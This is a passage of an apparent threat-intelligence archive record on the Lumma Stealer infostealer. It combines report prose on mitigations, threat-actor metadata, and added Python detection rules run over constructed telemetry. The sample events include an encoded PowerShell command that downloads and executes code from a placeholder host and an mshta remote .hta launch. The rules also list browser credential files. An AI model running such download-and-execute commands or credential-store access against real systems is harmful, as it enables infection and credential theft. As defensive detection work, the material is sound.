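    if ev['method'] == 'POST' and ev['path'].split('?')[0] in C2_PATHS:
        hits.append('c2-path-post')
    return hits


def decode_encoded_command(cmdline):
    # PowerShell takes any unambiguous prefix of -EncodedCommand; the argument is Base64 of UTF-16LE.
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def check_process_event(ev):
    # ev carries 'parent', 'image' and 'cmdline' (map Sysmon Event ID 1 or your EDR's fields
    # onto these names). Returns the names of the indicators that matched.
    hits = []
    if ev['image'].lower() not in LOLBINS:
        return hits
    # The Win+R Run box is hosted by explorer.exe, so a LOLBin spawned straight from it has
    # the shape of a paste-and-run (ClickFix) execution rather than a script or scheduled task.
    if ev['parent'].lower() == 'explorer.exe':
        hits.append('lolbin-from-explorer')
    decoded = decode_encoded_command(ev['cmdline'])
    if decoded is not None:
        hits.append('encoded-command')
    text = (ev['cmdline'] + ' ' + (decoded or '')).lower()
    if any(word in text for word in CRADLE_WORDS):
        hits.append('download-cradle')
    return hits


def encode_ps(script):
    # Produces the -enc argument form; used here only to build the constructed sample event.
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


# Constructed sample telemetry (not real captures); lure.example is a placeholder host.
SAMPLE_PROXY = [
    '2025-05-01T10:00:01Z|10.1.2.3|GET|https://www.example.com/index.html|200|Mozilla/5.0',
    '2025-05-01T10:00:07Z|10.1.2.3|POST|http://reinforcenh.shop/api|200|TeslaBrowser/5.5',
    '2025-05-01T10:00:09Z|10.1.2.9|POST|https://shop.example.net/api|200|Mozilla/5.0',
]
SAMPLE_PROCS = [
    {'parent': 'cmd.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe -File C:/scripts/backup.ps1'},
    {'parent': 'explorer.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe -w hidden -ep bypass -enc '
                + encode_ps('iex (iwr -UseBasicParsing http://lure.example/verify.txt).Content')},
    {'parent': 'explorer.exe', 'image': 'mshta.exe',
     'cmdline': 'mshta.exe https://lure.example/captcha.hta'},
]

if __name__ == '__main__':
    for line in SAMPLE_PROXY:
        print('proxy  ', check_proxy_line(line) or 'clean', '<-', line)
    for ev in SAMPLE_PROCS:
        print('process', check_process_event(ev) or 'clean', '<-', ev['cmdline'][:60])
```

Two caveats for production use: the domain and User-Agent matches are exact strings, and the report itself notes that Lumma rotates domains and changes its C2 protocol between versions, so these indicators decay quickly and should sit alongside the behavioural rules (explorer.exe spawning a LOLBin, an encoded command that decodes to a download cradle) which survive infrastructure churn. The third proxy line shows why a bare POST to /api is only a correlation signal: it fires on an ordinary site too.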
Behavior-based monitoring is crucial to detect unusual activity patterns, such as\r\nsuspicious processes attempting unauthorized network connections, which might be missed by traditional signature-based methods due to Lumma’s sophisticated obfuscation. Darktrace’s anomaly-based approach has been successful\r\nin identifying and providing visibility over Lumma activity.\r\nMajor Strategic Observations:\r\nMaaS Proliferation as an Enabler: Lumma Stealer undeniably highlights the profound impact of the MaaS model\r\nin lowering the barrier to entry for cybercrime. This model not only facilitates the rapid distribution and continuous\r\nevolution of sophisticated malware but also empowers a broad spectrum of threat actors, including prominent\r\nransomware groups like Octo Tempest, to execute complex attacks with minimal effort and low operational overhead.\r\nThe increasing availability of such tools means more frequent and widespread attacks, shifting the threat landscape\r\nsignificantly.\r\nPersistent Adaptability and Resilience: The malware’s relentless development cycle and its operators’ agility in\r\nadapting tactics, continuously refining evasion techniques (such as the novel anti-sandbox method utilizing\r\ntrigonometry for human behavior detection), and maintaining a dynamic, resilient infrastructure (through rapid\r\ndomain rotation and leveraging legitimate cloud services like Cloudflare) present an enduring and evolving challenge\r\nfor cybersecurity professionals. 
This inherent dynamism necessitates a fundamental shift in defensive strategies,\r\nmoving beyond static Indicator of Compromise (IOC)-based approaches towards more robust behavioral and\r\nanomaly-based detection methodologies.\r\nConvergence and Chaining of Threats: The frequent observation of Lumma Stealer being employed in conjunction\r\nwith other malware strains (e.g., Amadey Bot, RedLine, Vidar, Raccoon, Laplas Clipper, DanaBot, PrivateLoader,\r\nNetSupport Manager) and its established role as an initial access vector for subsequent, more severe attacks,\r\nincluding ransomware operations (as evidenced by its connection to the Change Healthcare attack), highlights a\r\ncritical and accelerating trend towards coordinated, multifaceted cyber threats. This synergistic integration\r\nsignificantly amplifies the overall impact of attacks and further complicates detection and remediation efforts for\r\ndefenders.\r\nExploitation of the Human Element as a Critical Vector: The consistent reliance on social engineering tactics —\r\nincluding sophisticated phishing campaigns, deceptive malvertising, and particularly clever “fake CAPTCHA” and\r\n“ClickFix” techniques — underscores that human interaction often remains the initial point of compromise. This\r\nfundamental vulnerability points to the enduring and critical need for significantly enhanced cybersecurity awareness\r\nand continuous training programs for all end-users within an organization.\r\nPost-Takedown Regeneration and Market Dynamics: Despite large-scale, coordinated global disruption\r\noperations led by law enforcement and private sector partners, the established pattern suggests that Lumma Stealer’s\r\ndevelopers are highly likely to attempt to rebuild their infrastructure with even more enhanced evasion capabilities,\r\nor new malware families will rapidly emerge to fill the operational void. 
This rapid regeneration and market fluidity\r\nemphasize that takedowns, while essential for temporary disruption, are not definitive solutions and necessitate\r\nsustained, proactive monitoring and highly adaptive response capabilities from the cybersecurity community.\r\nMonetization and Value of Stolen Data: The deeply lucrative nature of the stolen data, which is widely traded and\r\nsold on dark web forums, private Telegram channels, and specialized marketplaces (such as Russian Market and\r\nGenesis Market), acts as the core economic fuel for the entire infostealer ecosystem. The sheer volume and\r\ncomprehensive nature of the data exfiltrated by Lumma Stealer make it an exceptionally valuable commodity,\r\nfrequently serving as the foundation for subsequent identity-based attacks, widespread financial fraud, and more\r\ncomplex exploitation campaigns.\r\nMitigations and Recommendations: To effectively protect against Lumma Stealer and similar evolving threats, a multi-layered and proactive cybersecurity approach is absolutely essential.\r\nProactive Threat Intelligence Integration: Implement robust threat intelligence platforms (such as Alphatechs’\r\nSphere, XM Cyber’s CTEM, Bitsight TRACE, Cybereason GSOC, Outpost24 KrakenLabs, and Silent Push) for\r\ncontinuous, real-time monitoring of dark web activity, compromised credentials, and emerging TTPs specific to\r\ninfostealers.\r\nStrengthen Endpoint Protection: Deploy cutting-edge next-generation antivirus (NGAV) and Endpoint Detection\r\nand Response (EDR) solutions (e.g., Microsoft Defender) that are capable of detecting and responding to stealthy and\r\ncontinuously evolving malware variants. Ensure these solutions are regularly updated with the latest threat\r\nintelligence and signatures.\r\nEnhance Email Security: Invest in advanced email filtering and gateway solutions. 
Implement strict policies, enforced centrally (e.g., through Group Policy Objects, GPOs), to block malicious attachments and links from reaching\r\nend-users.\r\nImplement Robust Access Controls and MFA: Enforce the principle of least privilege, limiting user permissions\r\nto the absolute minimum necessary to perform their roles. Implement strict policies on software installation and\r\nexecution. Lumma Stealer has demonstrated capabilities to target 2FA tokens and session cookies, so Multi-Factor\r\nAuthentication (MFA) alone does not stop an attacker who replays a stolen session; combining MFA with phishing-resistant\r\nfactors, such as hardware tokens or biometric factors, still significantly strengthens access security. Post-infection,\r\nimmediately reset all credentials associated with compromised accounts and revoke active user sessions to prevent cookie\r\nreuse.\r\nContinuous Vulnerability Management and Patching: Regularly scan for and promptly patch vulnerabilities\r\nacross all systems, applications, and network devices. Timely software updates are critically important, especially\r\ngiven Lumma’s tendency to exploit recently discovered vulnerabilities.\r\nRestrict Unverified Software: Prohibit and actively prevent the downloading and installation of cracked or pirated\r\nsoftware. Limit employee use of unofficial applications from untrusted sources, including those sometimes found on\r\npublic code repositories like GitHub.\r\nNetwork Segmentation: Implement network segmentation to divide the computer network into smaller, isolated\r\nsegments or subnetworks. Lumma Stealer itself does not spread laterally, but segmentation limits what follow-on actors\r\nusing the credentials it harvests can reach, thereby containing potential infections and reducing their blast radius.\r\nAdopt Behavior-Based Monitoring: Prioritize and implement behavior-based monitoring solutions. 
These tools\r\nare crucial for detecting unusual activity patterns, such as suspicious processes attempting unauthorized network\r\nconnections or anomalous file access, which might be missed by traditional signature-based methods due to Lumma’s\r\nadvanced obfuscation.\r\nEstablish a Digital Risk Protection (DRP) Strategy: Develop and maintain a comprehensive DRP strategy to\r\nproactively monitor for exposed credentials and other sensitive organizational data on the dark web and other illicit\r\nmarketplaces.\r\nDevelop a Robust Incident Response Plan: Create and regularly test a comprehensive incident response plan that\r\nclearly outlines steps to take in the event of a malware infection. This should include immediate isolation of\r\ncompromised devices, locking active user sessions, blocking user accounts, re-imaging infected machines, and\r\nblocking identified IOCs at the firewall, proxy, and email gateway levels. In cases of persistent uncertainty or\r\ncomplex remediation, professional cybersecurity support from specialized incident response teams is highly\r\nrecommended.\r\nContinuous Security Awareness and Training: Implement continuous security awareness and training programs for\r\nall employees. Educate users on how to identify and avoid social engineering tactics, suspicious CAPTCHA prompts,\r\nmalicious links, and phishing attempts. Regular phishing simulations can significantly enhance employee vigilance\r\nand reduce the likelihood of accidental infection.\r\nConclusion: Lumma Stealer serves as a stark illustration of the evolving and persistent threat posed by information stealer\r\nmalware operating within a highly effective MaaS framework. Its rapid adoption, increasingly sophisticated evasion\r\ntechniques, and extensive data targeting capabilities have solidified its position as a dominant and formidable force within\r\nthe cybercrime ecosystem. 
While recent coordinated takedowns by international law enforcement and private sector partners\r\ndemonstrate the critical effectiveness of such collaborative efforts, the inherent resilience and continuous adaptability of\r\nLumma and its operators necessitate a perpetual, multi-layered defense strategy. Organizations and individuals alike must\r\nproactively prioritize robust security measures, including advanced threat intelligence, strong endpoint protection, stringent\r\naccess controls, continuous vulnerability management, and ongoing, adaptive security awareness training, to effectively\r\ncounter this dynamic and financially driven threat. The future trajectory of such malware likely involves even more evasive\r\nand deeply integrated variants, unequivocally reinforcing the ongoing and intense “battle between cybercriminals and\r\ndefenders”.\r\nSource: https://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4"
	],
	"report_names": [
		"lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c",
			"created_at": "2023-11-01T02:01:06.643737Z",
			"updated_at": "2026-04-10T02:00:05.340198Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"Scattered Spider",
				"Roasted 0ktapus",
				"Octo Tempest",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "MITRE:Scattered Spider",
			"tools": [
				"WarzoneRAT",
				"Rclone",
				"LaZagne",
				"Mimikatz",
				"Raccoon Stealer",
				"ngrok",
				"BlackCat",
				"ConnectWise"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0",
			"created_at": "2023-10-03T02:00:08.510742Z",
			"updated_at": "2026-04-10T02:00:03.374705Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"UNC3944",
				"Scattered Swine",
				"Octo Tempest",
				"DEV-0971",
				"Starfraud",
				"Muddled Libra",
				"Oktapus",
				"Scatter Swine",
				"0ktapus",
				"Storm-0971"
			],
			"source_name": "MISPGALAXY:Scattered Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9",
			"created_at": "2023-10-14T02:03:13.99057Z",
			"updated_at": "2026-04-10T02:00:04.531987Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"0ktapus",
				"LUCR-3",
				"Muddled Libra",
				"Octo Tempest",
				"Scatter Swine",
				"Scattered Spider",
				"Star Fraud",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "ETDA:Scattered Spider",
			"tools": [
				"ADRecon",
				"AnyDesk",
				"ConnectWise",
				"DCSync",
				"FiveTran",
				"FleetDeck",
				"Govmomi",
				"Hekatomb",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"Lumma Stealer",
				"LummaC2",
				"Mimikatz",
				"Ngrok",
				"PingCastle",
				"ProcDump",
				"PsExec",
				"Pulseway",
				"Pure Storage FlashArray",
				"Pure Storage FlashArray PowerShell SDK",
				"RedLine Stealer",
				"Rsocx",
				"RustDesk",
				"ScreenConnect",
				"SharpHound",
				"Socat",
				"Spidey Bot",
				"Splashtop",
				"Stealc",
				"TacticalRMM",
				"Tailscale",
				"TightVNC",
				"VIDAR",
				"Vidar Stealer",
				"WinRAR",
				"WsTunnel",
				"gosecretsdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c6d22751-e854-47de-a33d-2adf0058683e",
			"created_at": "2025-03-03T02:02:00.191696Z",
			"updated_at": "2026-04-10T02:00:04.534478Z",
			"deleted_at": null,
			"main_name": "Angry Likho",
			"aliases": [],
			"source_name": "ETDA:Angry Likho",
			"tools": [
				"Lumma Stealer",
				"LummaC2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ce6c9df9-bf82-4e6c-b355-9285463a37c8",
			"created_at": "2025-03-07T02:00:03.792481Z",
			"updated_at": "2026-04-10T02:00:03.818734Z",
			"deleted_at": null,
			"main_name": "Angry Likho",
			"aliases": [
				"Sticky Werewolf"
			],
			"source_name": "MISPGALAXY:Angry Likho",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824",
			"created_at": "2024-06-19T02:03:08.062614Z",
			"updated_at": "2026-04-10T02:00:03.655475Z",
			"deleted_at": null,
			"main_name": "GOLD HARVEST",
			"aliases": [
				"Octo Tempest ",
				"Roasted 0ktapus ",
				"Scatter Swine ",
				"Scattered Spider ",
				"UNC3944 "
			],
			"source_name": "Secureworks:GOLD HARVEST",
			"tools": [
				"AnyDesk",
				"ConnectWise Control",
				"Logmein"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775433976,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/446997379ebdfde8c75fcafaa57cbefc97fc6ef4.pdf",
		"text": "https://archive.orkl.eu/446997379ebdfde8c75fcafaa57cbefc97fc6ef4.txt",
		"img": "https://archive.orkl.eu/446997379ebdfde8c75fcafaa57cbefc97fc6ef4.jpg"
	}
}
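The detection indicators listed in the report text above (the TeslaBrowser/5.5 User-Agent, HKCU Run-key persistence, payload drops under AppData\Roaming\<random name>\, mshta.exe and powershell.exe used as downloaders, and access to browser credential stores such as key4.db and logins.json) turned into detection logic and run over constructed sample telemetry. This is an added example, not code from the report or from any vendor it names. The event field names are a hypothetical Sysmon-like shape rather than a real schema, the sample events are constructed, and generalising the report's two sample paths (bFylC6zX.zip, 7oCDTWYu\Set-up.exe) to "any 8-character alphanumeric name directly under AppData\Roaming" is an assumption.

```python
"""Detection logic for the Lumma Stealer indicators described in the report.

Added example, not the report's own code. Event field names are a hypothetical
Sysmon-like shape (assumption), and all sample events below are constructed.
"""
import re
from dataclasses import dataclass

# --- indicators taken from the report text ---
LUMMA_USER_AGENT = "TeslaBrowser/5.5"
RUN_KEY = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# Credential-store and stolen-data file names the report calls out.
CREDENTIAL_FILES = {"key4.db", "logins.json", "dp.txt", "system.txt"}
# LOLBins the report names as downloaders; a URL in the command line is the trigger.
DOWNLOADER_IMAGES = {"mshta.exe", "powershell.exe"}

# The report's two sample paths use an 8-character random name directly under
# AppData\Roaming (bFylC6zX.zip and 7oCDTWYu\Set-up.exe). Assumption: the
# 8-character length is generalised from those two samples.
RANDOM_ROAMING = re.compile(
    r"\\AppData\\Roaming\\[A-Za-z0-9]{8}(?:\\Set-up\.exe|\.zip)$", re.IGNORECASE
)
URL_IN_CMDLINE = re.compile(r"https?://", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def check_network(ev):
    """HTTP request carrying the report's C2 User-Agent."""
    if ev.get("type") == "http" and ev.get("user_agent") == LUMMA_USER_AGENT:
        return Finding("lumma_user_agent", ev["id"], f"{ev['method']} {ev['url']}")
    return None


def check_registry(ev):
    """Value written under the per-user Run key (persistence)."""
    if ev.get("type") == "registry" and ev.get("key", "").lower() == RUN_KEY.lower():
        return Finding("run_key_persistence", ev["id"], f"{ev['value_name']} = {ev['data']}")
    return None


def check_file(ev):
    """Random-named drop under AppData\\Roaming, or touch of a credential store."""
    if ev.get("type") != "file":
        return None
    path = ev.get("path", "")
    if RANDOM_ROAMING.search(path):
        return Finding("random_roaming_drop", ev["id"], path)
    if path.rsplit("\\", 1)[-1].lower() in CREDENTIAL_FILES:
        return Finding("credential_store_access", ev["id"], path)
    return None


def check_process(ev):
    """mshta.exe / powershell.exe launched with a URL on the command line."""
    if ev.get("type") != "process":
        return None
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    if image in DOWNLOADER_IMAGES and URL_IN_CMDLINE.search(ev.get("cmdline", "")):
        return Finding("lolbin_downloader", ev["id"], ev["cmdline"])
    return None


RULES = (check_network, check_registry, check_file, check_process)


def scan(events):
    """Run every rule over every event; return the list of findings."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def summarize(findings):
    """Count findings per rule, the view an analyst pivots on first."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry: three benign events and six matching the report's indicators.
SAMPLE_EVENTS = [
    {"id": 1, "type": "http", "method": "GET", "url": "https://example.com/", "user_agent": "Mozilla/5.0"},
    {"id": 2, "type": "http", "method": "POST", "url": "https://c2.example.invalid/api", "user_agent": "TeslaBrowser/5.5"},
    {"id": 3, "type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Set-up", "data": r"C:\Users\alice\AppData\Roaming\7oCDTWYu\Set-up.exe"},
    {"id": 4, "type": "file", "path": r"C:\Users\alice\AppData\Roaming\7oCDTWYu\Set-up.exe"},
    {"id": 5, "type": "file", "path": r"C:\Users\alice\AppData\Roaming\bFylC6zX.zip"},
    {"id": 6, "type": "file", "path": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x.default\logins.json"},
    {"id": 7, "type": "file", "path": r"C:\Users\alice\Documents\notes.txt"},
    {"id": 8, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://bad.example.invalid/verify.hta"},
    {"id": 9, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Date"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

The rules are deliberately independent so each can be tuned or dropped on its own: the User-Agent match is exact because the string is the indicator, while the file-path rule is a regex because the report's paths differ only in their random component. In a real pipeline the same functions would be fed normalised EDR or proxy events instead of the constructed list.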